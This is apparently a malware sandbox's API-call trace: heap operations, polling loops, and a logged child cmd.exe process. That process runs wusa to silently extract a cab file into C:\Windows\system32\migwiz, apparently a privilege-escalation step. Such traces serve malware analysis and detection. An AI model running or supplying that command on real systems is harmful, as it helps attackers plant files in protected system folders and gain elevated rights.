RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0321.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0321.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0321.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0321.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0321.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0321.478] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.479] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0321.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0321.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0321.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0321.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.479] timeGetTime () returned 0x50339 [0321.480] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.480] Sleep (dwMilliseconds=0xa) [0321.485] timeGetTime () returned 0x50349 [0321.485] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.485] Sleep (dwMilliseconds=0xa) [0321.501] timeGetTime () returned 0x50359 [0321.501] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.501] Sleep (dwMilliseconds=0xa) [0321.516] timeGetTime () returned 0x50368 [0321.516] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0321.516] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0321.516] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0321.516] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0321.517] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0321.517] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.517] Sleep (dwMilliseconds=0xa) [0321.533] timeGetTime () returned 0x50378 [0321.533] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.533] Sleep (dwMilliseconds=0xa) [0321.552] timeGetTime () returned 0x50387 [0321.552] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.553] Sleep (dwMilliseconds=0xa) [0321.563] timeGetTime () returned 0x50397 [0321.563] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.563] Sleep (dwMilliseconds=0xa) [0321.579] timeGetTime () returned 0x503a7 [0321.579] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.579] Sleep (dwMilliseconds=0xa) [0321.596] timeGetTime () returned 0x503b6 [0321.596] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.596] Sleep (dwMilliseconds=0xa) [0321.610] timeGetTime () returned 0x503c6 [0321.610] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.610] Sleep (dwMilliseconds=0xa) [0321.625] timeGetTime () returned 0x503d5 [0321.626] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.626] Sleep (dwMilliseconds=0xa) [0321.641] timeGetTime () returned 0x503e5 [0321.641] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.641] Sleep (dwMilliseconds=0xa) [0321.657] timeGetTime () returned 0x503f5 [0321.657] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.657] Sleep (dwMilliseconds=0xa) [0321.672] timeGetTime () returned 0x50404 [0321.672] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.672] Sleep (dwMilliseconds=0xa) [0321.688] timeGetTime () returned 0x50414 [0321.688] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.688] Sleep (dwMilliseconds=0xa) [0321.703] timeGetTime () returned 0x50423 [0321.704] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.704] Sleep (dwMilliseconds=0xa) [0321.719] timeGetTime () returned 0x50433 [0321.719] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.719] Sleep (dwMilliseconds=0xa) [0321.735] timeGetTime () returned 0x50443 [0321.735] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.735] Sleep (dwMilliseconds=0xa) [0321.750] timeGetTime () returned 0x50452 [0321.751] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.751] Sleep (dwMilliseconds=0xa) [0321.766] timeGetTime () returned 0x50462 [0321.766] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.766] Sleep (dwMilliseconds=0xa) [0321.782] timeGetTime () returned 0x50471 [0321.782] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.782] Sleep (dwMilliseconds=0xa) [0321.797] timeGetTime () returned 0x50481 [0321.797] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.797] Sleep (dwMilliseconds=0xa) [0321.813] timeGetTime () returned 0x50491 [0321.813] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.813] Sleep (dwMilliseconds=0xa) [0321.828] timeGetTime () returned 0x504a0 [0321.828] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.828] Sleep (dwMilliseconds=0xa) [0321.844] timeGetTime () returned 0x504b0 [0321.844] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.844] Sleep (dwMilliseconds=0xa) [0321.860] timeGetTime () returned 0x504bf [0321.860] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.860] Sleep (dwMilliseconds=0xa) [0321.875] timeGetTime () returned 0x504cf [0321.875] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.875] Sleep (dwMilliseconds=0xa) [0321.891] timeGetTime () returned 0x504df [0321.891] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.891] Sleep (dwMilliseconds=0xa) [0321.906] timeGetTime () returned 0x504ee [0321.906] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.906] Sleep (dwMilliseconds=0xa) [0321.922] timeGetTime () returned 0x504fe [0321.922] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.922] Sleep (dwMilliseconds=0xa) [0321.937] timeGetTime () returned 0x5050d [0321.938] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.938] Sleep (dwMilliseconds=0xa) [0321.961] timeGetTime () returned 0x5051d [0321.961] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.961] Sleep (dwMilliseconds=0xa) [0321.976] timeGetTime () returned 0x5052d [0321.976] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.977] Sleep (dwMilliseconds=0xa) [0321.985] timeGetTime () returned 0x5053c [0321.985] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.985] Sleep (dwMilliseconds=0xa) [0322.000] timeGetTime () returned 0x5054c [0322.000] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.000] Sleep (dwMilliseconds=0xa) [0322.019] timeGetTime () returned 0x5055b [0322.019] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.019] Sleep (dwMilliseconds=0xa) [0322.031] timeGetTime () returned 0x5056b [0322.031] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.031] Sleep (dwMilliseconds=0xa) [0322.047] timeGetTime () returned 0x5057b [0322.047] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.047] Sleep (dwMilliseconds=0xa) [0322.062] timeGetTime () returned 0x5058a [0322.063] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.063] Sleep (dwMilliseconds=0xa) [0322.078] timeGetTime () returned 0x5059a [0322.078] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.078] Sleep (dwMilliseconds=0xa) [0322.094] timeGetTime () returned 0x505a9 [0322.094] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.094] Sleep (dwMilliseconds=0xa) [0322.109] timeGetTime () returned 0x505b9 [0322.109] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.109] Sleep (dwMilliseconds=0xa) [0322.126] timeGetTime () returned 0x505c9 [0322.126] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.126] Sleep (dwMilliseconds=0xa) [0322.140] timeGetTime () returned 0x505d8 [0322.140] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.140] Sleep (dwMilliseconds=0xa) [0322.156] timeGetTime () returned 0x505e8 [0322.156] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.156] Sleep (dwMilliseconds=0xa) [0322.172] timeGetTime () returned 0x505f7 [0322.172] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.172] Sleep (dwMilliseconds=0xa) [0322.187] timeGetTime () returned 0x50607 [0322.187] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.187] Sleep (dwMilliseconds=0xa) [0322.203] timeGetTime () returned 0x50617 [0322.203] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.203] Sleep (dwMilliseconds=0xa) [0322.218] timeGetTime () returned 0x50626 [0322.218] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.218] Sleep (dwMilliseconds=0xa) [0322.234] timeGetTime () returned 0x50636 [0322.234] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.234] Sleep (dwMilliseconds=0xa) [0322.250] timeGetTime () returned 0x50645 [0322.250] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.250] Sleep (dwMilliseconds=0xa) [0322.265] timeGetTime () returned 0x50655 [0322.265] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.265] Sleep (dwMilliseconds=0xa) [0322.281] timeGetTime () returned 0x50665 [0322.281] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0322.281] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0322.281] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0322.281] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0322.281] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0322.281] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.281] Sleep (dwMilliseconds=0xa) [0322.296] timeGetTime () returned 0x50674 [0322.296] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.297] Sleep (dwMilliseconds=0xa) [0322.312] timeGetTime () returned 0x50684 [0322.312] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.312] Sleep (dwMilliseconds=0xa) [0322.328] timeGetTime () returned 0x50693 [0322.328] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.328] Sleep (dwMilliseconds=0xa) [0322.344] timeGetTime () returned 0x506a3 [0322.344] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.344] Sleep (dwMilliseconds=0xa) [0322.359] timeGetTime () returned 0x506b3 [0322.359] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.359] Sleep (dwMilliseconds=0xa) [0322.374] timeGetTime () returned 0x506c2 [0322.374] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.374] Sleep (dwMilliseconds=0xa) [0322.390] timeGetTime () returned 0x506d2 [0322.390] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.390] Sleep (dwMilliseconds=0xa) [0322.406] timeGetTime () returned 0x506e1 [0322.406] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0322.406] Sleep (dwMilliseconds=0xa) Thread: id = 2 os_tid = 0xb1c Thread: id = 3 os_tid = 0xb20 Thread: id = 8 os_tid = 0xb58 Thread: id = 9 os_tid = 0xb5c Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x30548000" os_pid = "0xb24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb0c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c wusa C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\64.cab /quiet /extract:C:\\Windows\\system32\\migwiz\\ & exit" cur_dir = "C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 4 os_tid = 0xb28 [0136.443] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f8b0 | out: lpSystemTimeAsFileTime=0x20f8b0*(dwLowDateTime=0x68ebcb0, dwHighDateTime=0x1d509d7)) [0136.443] GetCurrentProcessId () returned 0xb24 [0136.443] GetCurrentThreadId () returned 0xb28 [0136.443] GetTickCount () returned 0x2e149 [0136.443] QueryPerformanceCounter (in: lpPerformanceCount=0x20f8b8 | out: lpPerformanceCount=0x20f8b8*=23766354130) returned 1 [0136.444] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0136.444] __set_app_type (_Type=0x1) [0136.444] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0136.444] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0136.444] GetCurrentThreadId () returned 0xb28 [0136.444] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb28) returned 0x3c [0136.445] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0136.445] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0136.445] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0136.445] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.445] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f848 | out: phkResult=0x20f848*=0x0) returned 0x2 [0136.446] VirtualQuery (in: lpAddress=0x20f830, lpBuffer=0x20f7b0, dwLength=0x30 | out: lpBuffer=0x20f7b0*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.446] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7b0, dwLength=0x30 | out: lpBuffer=0x20f7b0*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.446] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7b0, dwLength=0x30 | out: lpBuffer=0x20f7b0*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.446] VirtualQuery (in: lpAddress=0x114000, lpBuffer=0x20f7b0, dwLength=0x30 | out: lpBuffer=0x20f7b0*(BaseAddress=0x114000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.446] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7b0, dwLength=0x30 | out: lpBuffer=0x20f7b0*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0136.446] GetConsoleOutputCP () returned 0x1b5 [0136.446] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 